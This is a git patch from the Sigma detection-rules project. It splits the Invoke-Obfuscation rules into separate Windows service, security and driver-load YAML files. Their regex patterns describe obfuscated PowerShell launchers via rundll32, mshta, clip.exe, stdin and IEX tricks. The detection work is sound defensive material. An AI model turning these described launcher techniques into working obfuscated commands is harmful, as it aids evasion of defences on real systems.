b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation RUNDLL LAUNCHER +id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: medium -detection: - selection: - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - condition: selection and selection_eventid ---- -id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index 4cc9ee79..f6a21dff 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Stdin +id: 487c7524-f892-4054-b263-8a0ace63fc25 description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - condition: selection and selection_eventid ---- -id: 487c7524-f892-4054-b263-8a0ace63fc25 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 82b66143-53ee-4369-ab02-de2c70cd6352 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 45b5d47b..a569fc7a 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use Clip +id: 63e3365d-4824-42d8-8b82-e56810fefa0c description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - condition: selection and selection_eventid ---- -id: 63e3365d-4824-42d8-8b82-e56810fefa0c logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index decfefb6..71b54142 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use MSHTA +id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - condition: selection and selection_eventid ---- -id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: a4e82ad2-7430-4ee8-b858-6ad6099773fa -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index a095343e..75b42d48 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use Rundll32 +id: 641a4bfb-c017-44f7-800c-2aee0184ce9b description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - condition: selection and selection_eventid ---- -id: 641a4bfb-c017-44f7-800c-2aee0184ce9b logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index af6859b6..7d8bc8d1 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - condition: selection and selection_eventid ---- -id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file From b6dc4de5e1b2e1167d4ddb20ba9f5b83680915db Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 22:42:59 +0200 Subject: [PATCH 0997/1367] split global win_invoke_obfuscation_* --- ...load_invoke_obfuscation_clip+_services.yml | 27 ++++++++++++++++ ...ke_obfuscation_obfuscated_iex_services.yml | 29 +++++++++++++++++ ...oad_invoke_obfuscation_stdin+_services.yml | 27 ++++++++++++++++ ...voke_obfuscation_via_compress_services.yml | 28 +++++++++++++++++ ...invoke_obfuscation_via_rundll_services.yml | 27 ++++++++++++++++ ..._invoke_obfuscation_via_stdin_services.yml | 27 ++++++++++++++++ ...voke_obfuscation_via_use_clip_services.yml | 27 ++++++++++++++++ ...oke_obfuscation_via_use_mshta_services.yml | 27 ++++++++++++++++ ..._obfuscation_via_use_rundll32_services.yml | 27 ++++++++++++++++ ..._invoke_obfuscation_via_var++_services.yml | 27 ++++++++++++++++ ...ke_obfuscation_clip+_services_security.yml | 30 ++++++++++++++++++ ...ation_obfuscated_iex_services_security.yml | 31 +++++++++++++++++++ ...e_obfuscation_stdin+_services_security.yml | 29 +++++++++++++++++ ...oke_obfuscation_var+_services_security.yml | 30 ++++++++++++++++++ ...scation_via_compress_services_security.yml | 29 +++++++++++++++++ ...fuscation_via_rundll_services_security.yml | 29 +++++++++++++++++ ...bfuscation_via_stdin_services_security.yml | 29 +++++++++++++++++ ...scation_via_use_clip_services_security.yml | 31 +++++++++++++++++++ ...cation_via_use_mshta_services_security.yml | 29 +++++++++++++++++ ...ion_via_use_rundll32_services_security.yml | 29 +++++++++++++++++ ...bfuscation_via_var++_services_security.yml | 29 +++++++++++++++++ 21 files changed, 598 insertions(+) create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml diff --git a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml new file mode 100644 index 00000000..8d2dea05 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation CLIP+ Launcher +id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 +related: + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of Clip.exe to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/13 +modified: 2021/09/16 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml new file mode 100644 index 00000000..98fcddc6 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation Obfuscated IEX Invocation +id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 +related: + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived +description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" +status: experimental +author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +date: 2019/11/08 +modified: 2021/09/16 +tags: + - attack.defense_evasion + - attack.t1027 +logsource: + product: windows + category: driver_load +detection: + selection: + - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' + - ImagePath|re: '\$VerbosePreference\.ToString\(' + - ImagePath|re: '\String\]\s*\$VerbosePreference' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml new file mode 100644 index 00000000..1d7b40b0 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation STDIN+ Launcher +id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e +related: + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of stdin to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/09/17 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml new file mode 100644 index 00000000..5b5b569c --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -0,0 +1,28 @@ +title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: c70731dd-0097-40ff-b112-f7032f29c16c +related: + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived +description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + + selection: + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection +falsepositives: + - unknown +level: medium \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml new file mode 100644 index 00000000..3ab2295d --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation RUNDLL LAUNCHER +id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c +related: + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived +description: Detects Obfuscated Powershell via RUNDLL LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml new file mode 100644 index 00000000..cb3a4f6c --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Stdin +id: 82b66143-53ee-4369-ab02-de2c70cd6352 +related: + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived +description: Detects Obfuscated Powershell via Stdin in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/12 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml new file mode 100644 index 00000000..a305c28b --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Use Clip +id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 +related: + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived +description: Detects Obfuscated Powershell via use Clip.exe in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml new file mode 100644 index 00000000..85dcade5 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Use MSHTA +id: a4e82ad2-7430-4ee8-b858-6ad6099773fa +related: + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived +description: Detects Obfuscated Powershell via use MSHTA in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml new file mode 100644 index 00000000..16bd38f5 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation Via Use Rundll32 +id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 +related: + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived +description: Detects Obfuscated Powershell via use Rundll32 in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml new file mode 100644 index 00000000..749214cf --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml @@ -0,0 +1,27 @@ +title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d +related: + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived +description: Detects Obfuscated Powershell via VAR++ LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/13 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml new file mode 100644 index 00000000..3437be16 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml @@ -0,0 +1,30 @@ +title: Invoke-Obfuscation CLIP+ Launcher +id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 +related: + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of Clip.exe to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/13 +modified: 2021/09/16 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 + +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml new file mode 100644 index 00000000..8f59c788 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml @@ -0,0 +1,31 @@ +title: Invoke-Obfuscation Obfuscated IEX Invocation +id: fd0f5778-d3cb-4c9a-9695-66759d04702a +related: + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived +description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" +status: experimental +author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +date: 2019/11/08 +modified: 2021/09/16 +tags: + - attack.defense_evasion + - attack.t1027 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + selection_1: + - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' + - ImagePath|re: '\$VerbosePreference\.ToString\(' + - ImagePath|re: '\String\]\s*\$VerbosePreference' + condition: selection and selection_1 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml new file mode 100644 index 00000000..92e539b6 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation STDIN+ Launcher +id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 +related: + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of stdin to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/09/17 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml new file mode 100644 index 00000000..de9ff35a --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml @@ -0,0 +1,30 @@ +title: Invoke-Obfuscation VAR+ Launcher +id: dcf2db1f-f091-425b-a821-c05875b8925a +related: + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived +description: Detects Obfuscated use of Environment Variables to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/09/17 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + condition: all of them +falsepositives: + - Unknown +level: high + diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml new file mode 100644 index 00000000..fef655aa --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 +related: + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived +description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection and selection_eventid +falsepositives: + - unknown +level: medium \ No newline at end of file diff --git 